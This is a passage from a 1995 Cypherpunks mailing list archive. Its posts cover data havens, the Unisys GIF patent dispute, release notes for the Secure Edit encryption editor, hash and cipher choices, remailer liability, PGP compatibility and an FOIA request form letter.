Dave his smut, Sam retrieves the file without paying for its continued storage--and takes a sneak peak at the pictures before deleting them himself. Dave has no way of knowing what people are storing on his machine until the owner asks for the file back, and so cannot be held liable for the storage of "undesirable" files. Mallet could seize the entire archive and have nothing useful. Eve could recover information leaving the haven, but presumably Alice will further encrypt her files however she chooses. Or, as a service, Dave could agree to encrypt the file with an assymetric cipher before returning it. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From dean at hi.com Thu Jan 12 17:24:56 1995 From: dean at hi.com (Dean Anderson) Date: Thu, 12 Jan 95 17:24:56 PST Subject: /n@Nd0/ LPF Statement on the GIF controversy Message-ID: <9501092348.AA28210@loki.hi.com.nando> [ Please repost this wherever you think is appropriate! ] Until now, most computer professionals and companies have ignored the problem of software patents. The GIF format for graphical images was adopted widely on the net, despite the Unisys patent covering the LZW data compression algorithm. The patent dates to 1985, but its enforcement has been carried out with private threats; most victims are afraid to talk about it. Now the patent has shown its teeth. For a few days, the Internet community was shaking with anger at the surprise demand to pay license fees for the use of GIF format. It turns out that the license being offered today is only for Compuserve users. Compuserve accepted an offer from Unisys that they couldn't refuse. Compuserve users can accept this offer now, or face Unisys later on their own. The rest of us don't have a choice--we get to face Unisys when they decide it's our turn. So much trouble from just one software patent. There are now over ten thousand software patents in the US, and several thousand more are issued each year. Each one may be owned by, or could be bought by, a grasping company whose lawyers carefully plan to attack people at their most vulnerable moments. Of course, they couch the threat as a "reasonable offer" to save you miserable years in court. "Divide and conquer" is the watchword: pursue one group at a time, while advising the rest of us to relax because we are in no danger today. Software patents may not seem like an urgent problem until you find one aimed at you. We all have other fires to fight, and most developers have hoped that the patents would never blaze up. In an ironic way, Unisys has done us a favor--by showing that the problem is too serious to ignore. What people first feared, could just as well have happened. Each of the thousands of software patents has the potential to devastate a segment of the community, both software developers and users. There will be more nasty surprises. They are part of a system. Unisys has given us a chance to work together to change the system--rather than waiting to be sued one by one for this patent or that. We can win the fight against software patents, if we speak loud and clear against them. What can people do? * Express your disapproval to Unisys by writing a letter to its CEO. Tell him what you think of his company's actions: James Unruh CEO UNISYS Corp. PO Box 500 Blue Bell, PA 19424 fax: 215-986-6850 Please use snail mail--a physical pile of letters is more impressive, psychologically, than a big file of email. Keep it short--ten lines is enough. Don't spend hours composing your letter; there's no need. But do write it in your own words, because sending a form letter written by someone else is not impressive. Make it clear that the usual excuses--"We're just exercising our property rights; look how reasonable we are being (compared to what we _could_ have done)"--won't wash with you. Avoid saying anything nasty that would give Unisys a chance to paint itself as the victim. Cold condemnation is more powerful than flames. Please email a copy of your letter to the League for Programming Freedom at gif-letters at lpf.org. We might ask you for permission to publish your letter. * Don't sign a license--stop using GIF. The World Wide Web consortium at MIT will probably be coordinating the move away from GIF, and offering advice and assistance. See `http://www.w3.org/'. * Join the League for Programming Freedom. The League is a membership-based organization whose aim is to bring back the freedom to write software. The League says that no one should be able to dictate what kinds of programs you can write. You can contact the LPF by email to lpf at uunet.uu.net, or look at its Web pages at `http://www.lpf.org/'. ** Note: the recent license demand came in the name of Compuserve; but the impetus for it came from Unisys. Compuserve developed the GIF format many years ago, not knowing there was a patent on LZW. (Most programmers have no idea what patents their programs are vulnerable to--there are too many patents to keep track of.) When Unisys threatened to sue them, Compuserve had to give in to Unisys's demands. Compuserve arranged to be allowed to offer Compuserve users a sublicense, but the "offer" was formulated in a way that was tantamount to an ultimatum. Compuserve may bear responsibility for some of the details of how this was handled, but the main responsibility falls on Unisys. It is Unisys that claims the power to dictate what kinds of software you can write. Unisys decided to use the power for aggression; Unisys forced Compuserve to participate. =++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++= Dean Anderson Dean at hi.com President League for Programming Freedom From Ben.Goren at asu.edu Thu Jan 12 17:33:12 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Thu, 12 Jan 95 17:33:12 PST Subject: RELEASE: Secure Edit beta 0.5 Message-ID: At 5:18 PM 1/12/95, Tom Bryce wrote: >[. . .] >* the salt is concatenated with MD5[passphrase] many times and this >concatenated string hashed to generate the 'session key' for the file >from your pass phrase. The number of times it is concatenated is >calibrated to make it take about half a second - not a big performance >loss, but it makes brute force attack of weak passphrases up to >thousands of times more costly. >[. . . .] This is only going to work if MD5 is not a "group"--that is, if there is no simple algorithm which is equivialent to md5(md5(x)). I doubt that's been proven. Rather, you'd be better off using DES in any of the ways that Schneir describes (page 338 and following) and reiterate that many times. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From pstemari at erinet.com Thu Jan 12 17:46:19 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Thu, 12 Jan 95 17:46:19 PST Subject: How do I know if its encrypted? Message-ID: <9501130137.AA03281@eri.erinet.com> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > ... Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. Perhaps I missed this, but why? If someone is going to plant kiddie porn or whatever on you, does it really matter if they encrypt it first or not? If the purpose is simply to generate additional encrypted traffic to obscure stuff that needs encryption, that goal might be better served by simply encrypting files for their recipient as they pass through, in those cases where a public key is available and the msg isn't already encrypted. I forget the name of the cypher (Vigere, perhaps--the one that uses a series of Caesar-like cyphers keyed by a password), but you could just run it through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution enough to get it by casual inspection. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From adamfast at seanet.com Thu Jan 12 18:15:04 1995 From: adamfast at seanet.com (Adam Feuer) Date: Thu, 12 Jan 95 18:15:04 PST Subject: essential characteristics of a Data Haven Message-ID: folks, looking thru the cyphernomicon, this is about all i could come up with for characteristics of a data haven: |16.22. Data Havens | 16.22.1. "What are data havens?" | + Places where data can be hidden or protected against legal | action. | - Sterling, "Islands in the Net," 1988 anyone have a list of the essential characteristics of a data haven? what differentiates a "data haven" from "reasonably secure offsite storage"? here's my attempt at a working definition: a "data haven"... 1. "securely" stores data files for remote users. 2. will only allow "authorized" entities to store files in the data haven. 3. will only allow "owners" of the files to withdraw their files from the data haven. 4. differentiates "authorized" entities from "non-authorized ones, and "owners" from "non-owners", only by means of cryptographic keys. terms i left undefined are "securely," authorized," and "owner." by "secure" i imagine a DH will attempt to prevent its data from being destroyed, or read by anyone other than the data's "owner." by "authorized" i imagine that a DH will not want to accept data from just anyone. (for instance, people who don't pay.) by "owner" i mean the specific "authorized" entity that stored the data in the DH. i imagine that most DH's will need to accept digital cash to be able to operate. is this an essential characteristic of a cp data haven? what did i leave out? adam adamfast at seanet.com From rrothenb at libws4.ic.sunysb.edu Thu Jan 12 19:21:04 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Thu, 12 Jan 95 19:21:04 PST Subject: How "good" is MDC? Message-ID: <9501130321.AA03497@toad.com> I've been toying with a homegrown implementation of the MDC algorithm, similar to the one used in HPack, written mostly in 386 assembler though. My version also scrambles the constants by multiple cycles over the key, so it should be better the vanilla MD5... I'm wondering how "secure" MDC is, though... are there better hashing algorithms or possible modifications that could be made? (A silly question considering I haven't yet released the sources. When they are ready I'll post an announcement or something.) Rob From m00012 at KANGA.STCLOUD.MSUS.EDU Thu Jan 12 19:21:32 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Thu, 12 Jan 95 19:21:32 PST Subject: Keyboard sniffer source code Message-ID: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU> Not to be paranoid, but did anybody receive that program? Does cypherpunkcs at toad.com have a pgp key? I think it was intercepted. mike From tjb at acpub.duke.edu Thu Jan 12 19:25:28 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 19:25:28 PST Subject: RELEASE: Secure Edit beta 0.5 Message-ID: Ben Goren wrote: >At 5:18 PM 1/12/95, Tom Bryce wrote: >>[. . .] >>* the salt is concatenated with MD5[passphrase] many times and this >>concatenated string hashed to generate the 'session key' for the file >>from your pass phrase. The number of times it is concatenated is >>calibrated to make it take about half a second - not a big performance >>loss, but it makes brute force attack of weak passphrases up to >>thousands of times more costly. >>[. . . .] > >This is only going to work if MD5 is not a "group"--that is, if there is no >simple algorithm which is equivialent to md5(md5(x)). I doubt that's been >proven. This is not exactly what secure edit does. It hashes in the following manner to generate a session key: MD5 [ (128-bit salt) MD5[passphrase] 0 MD5[passphrase] 1 MD5[passphrase] 2 ... ] to get the session key. The 0, 1, 2 is a single byte. So there is only one level of nesting of the hashes. This is actually a common and well-regarded technique for increasing the security of weak passphrases. Tom ------------------------------------------------------------------------ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\ | Tom Bryce |____| ___ | Duke Med | ___ {~._.~} | tjb at acpub.duke.edu | {~._.~) ( Y ) | PGP keys: finger tjbryce at amherst.edu | ( Y ) ()~*~() |personal:9B6088464ED86413 0F5E55E45CF1C961| ()~*~() (_)-(_) |miyako | (_)-(_) |software:02646F0B06DCFE03 E6DD367DB4E1010F| /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ | \_________________________________________\__/ From tjb at acpub.duke.edu Thu Jan 12 19:33:07 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 19:33:07 PST Subject: RELEASE: secure edit, resend (was bad pgp signature) Message-ID: It's been brought to my attention that I messed up and the pgp signature did not validate my post about secure edit. I'm not sure where exactly I messed up, but here goes again... sorry for sending it twice. :( -----BEGIN PGP SIGNED MESSAGE----- RELEASE: secure edit beta 0.5 for Macintosh Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key. Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. * semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. * Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxX0v08YjrUhOUC5AQE/UwP/eLKniLvJhYm1b1RZf0/0qY3mBUfhIMeT R/ozIURiOD/qnfmn6Un9BAVvEBiVxivj8z6J2ByOREGO1ZYgpO1kZcEu0tZoP0eo 4fGeg652BYRqk4+Ltw3XcV1nDfudukAOoT9waiub1JsPeNDP/DuM+yt05gPNplNV UMToRWfMgaM= =T/QC -----END PGP SIGNATURE----- From Paul.Foley at vuw.ac.nz Thu Jan 12 19:33:57 1995 From: Paul.Foley at vuw.ac.nz (Paul Foley) Date: Thu, 12 Jan 95 19:33:57 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: <199501130333.QAA03633@akeake.its.vuw.ac.nz> Black Unicorn wrote: >> This is EXACTLY what I was contemplating. I really wish they would >> implement it. Then I can get the traveler's cheques out of my wallet. >> (unsigned in both spots of, course.) > >Is this not essentially the same as the current pre-paid long distance >Phone cards on the market? > >One would think the transition as easy for the credit card companies to >make with a secured, disposable visa card. NZ Telecom are conducting an experiment with using phonecards in softdrink vending machines. There was an article in The Dominion newspaper's _InfoTech_ magazine crying out for the Government to stop it, claiming Telecom's creating an independant (from the Reserve Bank) currency, will destroy the New Zealand economy, etc., etc. --- Paul Foley ----- PGP encrypted mail preferred PGP key available from keyservers or finger (finger pfoley at akeake.its.vuw.ac.nz) From lce at wwa.com Thu Jan 12 19:49:37 1995 From: lce at wwa.com (Larry E) Date: Thu, 12 Jan 95 19:49:37 PST Subject: How do I know if its encrypted? In-Reply-To: <9501130137.AA03281@eri.erinet.com> Message-ID: In article <9501130137.AA03281 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote: > At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > > ... Seems to me that a quite reasonable condition of use of a remailer is > >that what is passed isn't human readable. > > Perhaps I missed this, but why? If someone is going to plant kiddie porn or > whatever on you, does it really matter if they encrypt it first or not? > The goal is to convince the two groups of concerned parties that the remailer operators don't know the contents of what's passing through their remailers: (1) the people who use the remailer, who get a measure of comfort from knowing their communication is secure (2) legal groups etc. who may try to hold the remailer liable in some way for what passes through their remailer. A large percentage of material that passes through remailers might be offensive to SOMEONE---if even just because an unpopular opinion is expressed. The remailers are operated by people who want to promote information flow, not restrict it. They provide an important service that is of critical importance to some people and groups who use the net. They shouldn't be held accountable for the few who abuse the remailers, and encryption helps prevent that from happening. From chen at intuit.com Thu Jan 12 19:49:56 1995 From: chen at intuit.com (Mark Chen) Date: Thu, 12 Jan 95 19:49:56 PST Subject: Crypto functions In-Reply-To: <199501102139.QAA00961@bb.hks.net> Message-ID: <9501122119.AA05796@doom.intuit.com> > What crypto functions are considered modern and usable? The list I have > right now is: > > RSA > IDEA > DES > 3DES > RC4 > RC5 > BLOWFISH > MD4 > MD5 > > (and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars > with "flamingo".) > > Pointers to code for any other schemes will be greatly appreciated. You might want to include LUC, even though it is fairly new and extremely cumbersome to implement (though, I would say, not outright unusable). Among symmetric ciphers, there's GOST. And I'd count SHA as a reliable hash function. -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From tjb at callisto.acpub.duke.edu Thu Jan 12 20:56:57 1995 From: tjb at callisto.acpub.duke.edu (tjb) Date: Thu, 12 Jan 95 20:56:57 PST Subject: RELEASE: Secure Edit beta 0.5 (again!) Message-ID: <199501130455.XAA28049@mail.duke.edu> I again apologize for sending this a THIRD time, but we all agree it's important for PGP signatures to verify properly or people will get sloppy about verifying them and expecting them to be valid. I strongly suspect Eudora is doing some formatting of the email when I send it with Eudora, so I'm sending this post through internews instead. This really should work - I always paste it first in here, then check the signature on the clipboard with macpgp. It checks out fine, but when I send it to the list, the signature doesn't verify again. Tom -----BEGIN PGP SIGNED MESSAGE----- RELEASE: secure edit beta 0.5 for Macintosh Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key. Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. * semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. * Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxX0v08YjrUhOUC5AQE/UwP/eLKniLvJhYm1b1RZf0/0qY3mBUfhIMeT R/ozIURiOD/qnfmn6Un9BAVvEBiVxivj8z6J2ByOREGO1ZYgpO1kZcEu0tZoP0eo 4fGeg652BYRqk4+Ltw3XcV1nDfudukAOoT9waiub1JsPeNDP/DuM+yt05gPNplNV UMToRWfMgaM= =T/QC -----END PGP SIGNATURE----- From sdw at lig.net Thu Jan 12 20:58:31 1995 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 12 Jan 95 20:58:31 PST Subject: time stamping service (again) In-Reply-To: Message-ID: > > -----BEGIN PGP SIGNED MESSAGE----- > > My PGP based time stamping service is back online. I took it > down a while ago thinking the folks at notary.com (Digital > Time-Stamp, Inc.) were going to release their commercial ... This is elegant and great... Why don't we add to the todo list the following: Let's package up a number of the self-contained services, code, etc. into a bundle that can be installed all at once (say on a Linux system :-) ) and call it the 'CypherStation' release. We can try to reach a concensus for standard service naming/access methods and create a federation of these things. It should have minimize bandwidth, minimize cpu, minimize storage levels of service to allow different levels of users to have different possible impact on the machine. (Ie. : local, paying, regional, unknown, domain, etc.) I know that those of us running Internet services would devote a little of our imaginary free time. We could have a string to identify available services and versions: CypherStation/.01/Serv:RTAmAh1.3 Where each service could have versions that differed from the release. Just some raw thought. sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From skaplin at mirage.skypoint.com Thu Jan 12 21:19:50 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Thu, 12 Jan 95 21:19:50 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 12 Jan 1995 17:09:33 -0800 (PST), Syed Yusuf wrote: > > > On Wed, 11 Jan 1995, Samuel Kaplin wrote: > > > I hope they took you someplace nice for lunch...You might want to file a > > FOI request on yourself, just to see how much they censor. ;) They might > > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > > > > For the benifit of myself and the list, how would you go about doing that? Fill out this form letter, get it notarized and send it to the address in the letterhead. Be prepared to wait and get jerked around. I have heard that some FOI requests have taken as long as two years to get back. Sam PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST (date) (requester's name and address) Federal Bureau of Investigation Records Management Division - FOIA/PA Office 9th & Pennsylvania Avenue NW Washington, DC 20535 Gentlemen: This is a request for records under the provisions of both the Privacy Act (5 USC 552b) and the Freedom of Information Act (5 USC 522). This request is being made under both Acts. I hereby request one copy of any and all records about me or referencing me maintained at the FBI. This includes (but should not be limited to) documents, reports, memoranda, letters, electronic files, database references, "do not file" files, photographs, audio tapes, videotapes, electronic or photographic surveillance, "june mail", mail covers, and other miscellaneous files, and index citations relating to me or referencing me in other files. My full name is:___________________________________ My date of birth was______________ My place of birth was:______________________________ My social security #:______________ I have lived in these places: Other names, places, events, organizations or other references under which you may find applicable records: As you know, FOIA/PA regulations provide that even if some requested material is properly exempt from mandatory disclosure, all segregable portions must be released. If the requested material is released with deletions, I ask that each deletion be marked to indicate the exemption(s) being claimed to authorize each particular withholding. In addition, I ask that your agency exercise its discretion to release any records which may be technically exempt, but where withholding serves no important public interest. I hereby agree to pay reasonable costs associated with this request up to a maximum of $25 without my additional approval. However, I strongly request a fee waiver because this is, in part, a Privacy Act request. This letter and my signature have been certified by a notary public as marked below. Sincerely, _____________________________________________ requester's signature _____________________________________________ requester's printed name _____________________________________________ notary stamp and signature - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== Ambition is a poor excuse for not having sense enough to be lazy. -- Charlie McCarthy -- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLxYL5clnXxBRSgfNAQG7Hwf+KMyddMOOrwF1y87eAZzQ49yToEewy3BD leOTr8vIqOnwPYAGINmH06dUkK8bsMzO9yQKgPnXtr5azjQ1DdGeK/BK23xJx2qm 98rSz68izH2Xi9j0Lcnskafie9oD758D516pl0K14hFNgh9RtrI804QtC7m4lUGK OfwveyOs6j8O4OwIQQSFb8wStK8WVseaTe1EZrwJjaGcFUOgBNQ6GSe8tLeaBg4+ z6Ruh9oTnzHPSqW4qlnq5wxj/r5dctoQbJkaBut/trj95fgTnrsgOvwlDGCRGCAz 9vcz0jeIaanS8apJ8BUtxkUkQOOFFsKPIvb1viCXTE3qfzwQuYab6Q== =HjoK -----END PGP SIGNATURE----- From ianf at sydney.sgi.com Thu Jan 12 21:46:02 1995 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 12 Jan 95 21:46:02 PST Subject: Crypto functions In-Reply-To: <9501122119.AA05796@doom.intuit.com> Message-ID: <9501131633.ZM23442@wiley.sydney.sgi.com> On Jan 12, 1:21pm, Mark Chen wrote: > Among symmetric ciphers, there's GOST. Using which S-boxes though? Matt posted a set a while ago, although I suspect they were the ones the Soviet public got, and probably not overly secure. Add the latest (91 I think) version LOKI to the list. Only a 64 bit key, but still not bad, reasonably well studied, and free. Ian. From crunch at well.sf.ca.us Thu Jan 12 21:51:26 1995 From: crunch at well.sf.ca.us (John Draper) Date: Thu, 12 Jan 95 21:51:26 PST Subject: Some PGP problems Message-ID: <199501130551.VAA01278@well.sf.ca.us> Hi, I'm trying to decode a PGP file that was created with Ver 2.6. At this time, I thought that my older ver 2.1c (Running on a Mac) would at least be able to decrypt something made from a higher version, running on a PC. Apparently that is not so. So, the next thing I did, or what any self respecting Cypherpunk might so, is to go out on the net and look for a later version to FTP> Well, after discovering that soda.berkeley.edu don't exist anymore, I eventually found the ftp site where it lives. ftp.csua.berkeley.edu. I learn that Mac PGP2.3 exists, but NO version 2.6 exists for the Mac. Is that true? If not, then where can I get a copy, so I can decode a message created with 2.6? If ver 2.3 will decode a message encoded with 2.6, then I'm faced with how I can extract this Mac file which has a .gz extension. Binhex don't seem to decode it. So, I now got this file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was I supposed to have used some special UNIX itility to convert the .gz thingie first? Please emlighten this confused cypherpunker!!! :-) Or will I even have to do all of this because 2.3 is incompatable with 2.6. C. Crunch From ianf at sydney.sgi.com Thu Jan 12 22:01:10 1995 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Thu, 12 Jan 95 22:01:10 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: <9501131639.ZM23450@wiley.sydney.sgi.com> On Jan 12, 11:05pm, Samuel Kaplin wrote: > Fill out this form letter, get it notarized and send it to the address in > the letterhead. Be prepared to wait and get jerked around. I have heard > that some FOI requests have taken as long as two years to get back. Although the FBI only have juristiction within the US, it is quite possible that they would have files containing information about non-US nationals if they were involved (perhaps even peripherally) in domestic FBI investigations. I wonder what would happen if a non-US citizen logged an FOI request? Has anyone ever tried? Ian. From jamesd at netcom.com Thu Jan 12 22:02:15 1995 From: jamesd at netcom.com (James A. Donald) Date: Thu, 12 Jan 95 22:02:15 PST Subject: Purpose of Data Havens In-Reply-To: <199501121810.NAA25089@bb.hks.net> Message-ID: On Thu, 12 Jan 1995, L. McCarthy wrote: > Scenario: June is a test engineer at Rockwell Intl. At the lab where she works, > it is observed that some rubber O-rings being designed for the space shuttle > are liable to crack, and lose their airtight seal, when exposed to the > extremely low temperatures of space. The project is behind, so the researchers > are instructed to proceed in spite of the problem. June encrypts the test > results and deposits them in a data haven. Digression: The interesting thing is that NASA was damn near able to keep this matter secret despite the projects chief engineer kicking and screaming. When Feynman wandered in to Morton Thiokol and started asking questions he was not met with a cover up -- instead he was told the whole story, complete with the chart that lead the chief booster engineer, with the support of the entire engineering team, to send email and written reports that the Challenger would blow up unless the launch was delayed. And despite one of the worlds most famous scientists knowing the truth, and despite the fact that he was the only scientist on the commission of enquiry, they still might well have kept it quiet if Feynman had not ambushed them on TV. And despite Feynmans ambush, they still managed pretty good damage control. Of course today such a 